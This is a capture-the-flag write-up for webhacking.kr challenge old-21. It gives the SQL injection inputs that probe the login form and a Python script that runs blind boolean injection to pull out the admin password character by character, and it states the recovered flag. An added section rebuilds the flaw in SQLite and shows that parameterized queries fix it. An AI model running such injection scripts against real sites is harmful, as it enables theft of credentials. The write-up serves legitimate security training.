
# old-21 (250)

This is the initial screen.

![](/files/-M0_Yi4sAyncJktK0x8o)

Entering `admin` for id and `' or '1` for pw produces the Result shown below.

![](/files/-M0aHBLJyj5koTnC6g6E)

Entering `admin` for id and `' or '0` for pw produces the Result shown below.

![](/files/-M0aHJe8upf3qwdBpRr9)

I inferred that the Result differs depending on whether the pw value evaluates to true or false.

Python code that uses this difference is shown below.

```python
import requests

URL = 'https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw='
TRUE_PHRASE = 'wrong password'


def query(payload):
    # True when the response contains TRUE_PHRASE, i.e. the injected condition evaluated to true.
    r = requests.get(URL + payload)
    return TRUE_PHRASE in r.text


# Increment the candidate length until the condition is true. Result: 36
def find_pw_length():
    pw_len = 1
    while not query("' or id='admin' and length(pw)={}%23".format(pw_len)):
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# Compare each position of pw against every ASCII code.
# Result: there_is_no_rest_for_the_white_angel
def find_pw():
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query("' or id='admin' and ord(substr(pw,{},1))={}%23".format(pos, character)):
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()
```

Running the script shows that the pw is `there_is_no_rest_for_the_white_angel`.

Entering `admin` for id and `there_is_no_rest_for_the_white_angel` for pw and pressing the submit button solves the challenge.
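
The different Results for `' or '1` and `' or '0` are what a login query built by string concatenation produces. The following added example (not part of the original write-up and not the challenge's server code) reproduces that behaviour on a constructed in-memory SQLite table and shows that a parameterized query returns the same Result for both inputs. The table name `member`, the stored value, the query shape, and the `login fail` / `login success` strings are assumptions; only `wrong password` appears on the page.

```python
import sqlite3


def make_db():
    # Constructed stand-in table; the real schema is not shown on the page.
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE member (id TEXT, pw TEXT)')
    db.execute("INSERT INTO member VALUES ('admin', 'constructed-secret')")
    return db


def result(row, pw):
    # Three outcomes: no row, row with matching pw, row with non-matching pw.
    if row is None:
        return 'login fail'        # assumed label
    if row[0] == pw:
        return 'login success'     # assumed label
    return 'wrong password'        # phrase the write-up's script looks for


def login_concat(db, user, pw):
    # Vulnerable form (assumed): input is pasted into the SQL text, so a quote
    # in pw ends the string literal and the rest is parsed as SQL.
    sql = "SELECT pw FROM member WHERE id='{}' AND pw='{}'".format(user, pw)
    return result(db.execute(sql).fetchone(), pw)


def login_param(db, user, pw):
    # Hardened form: values are bound as parameters and are never parsed as SQL.
    sql = 'SELECT pw FROM member WHERE id=? AND pw=?'
    return result(db.execute(sql, (user, pw)).fetchone(), pw)


if __name__ == '__main__':
    db = make_db()
    for pw in ("' or '1", "' or '0"):
        print(repr(pw), '| concat:', login_concat(db, 'admin', pw),
              '| param:', login_param(db, 'admin', pw))
```

With bound parameters both inputs give the same Result, so the response no longer reveals whether an injected condition was true.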

